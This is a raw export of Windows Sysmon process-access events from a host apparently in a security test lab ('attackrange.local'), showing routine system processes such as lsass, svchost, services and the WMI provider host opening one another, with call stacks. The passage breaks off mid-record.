21:45:41.901{39BD8DE3-0F64-60CA-0B00-00000000D101}6245668C:\Windows\system32\lsass.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151113Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.901{39BD8DE3-3FF8-60CA-FA06-00000000D101}54283288C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\combase.dll+251f2|C:\Windows\System32\combase.dll+25b1e|C:\Windows\System32\combase.dll+258df|C:\Windows\System32\combase.dll+59288|C:\Windows\System32\combase.dll+58ea0|C:\Windows\System32\combase.dll+66087|C:\Windows\System32\combase.dll+c2554|C:\Windows\System32\combase.dll+62f11|C:\Windows\System32\combase.dll+646f0|C:\Windows\System32\combase.dll+217a|C:\Windows\System32\RPCRT4.dll+da374|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x8000000000000000151112Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.701{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151111Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.701{39BD8DE3-0F64-60CA-0A00-00000000D101}6165064C:\Windows\system32\services.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151110Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.679{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151109Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.679{39BD8DE3-0F64-60CA-0A00-00000000D101}6164884C:\Windows\system32\services.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151108Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.664{39BD8DE3-0F64-60CA-0B00-00000000D101}6245668C:\Windows\system32\lsass.exe{39BD8DE3-0F64-60CA-0A00-00000000D101}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151107Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.664{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151106Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.664{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151105Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.664{39BD8DE3-0F64-60CA-0B00-00000000D101}6245668C:\Windows\system32\lsass.exe{39BD8DE3-0F64-60CA-0A00-00000000D101}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151104Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.664{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151103Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.664{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5fbdb|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151102Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.664{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151101Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151100Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151099Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151098Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151097Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151096Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151095Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151094Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program 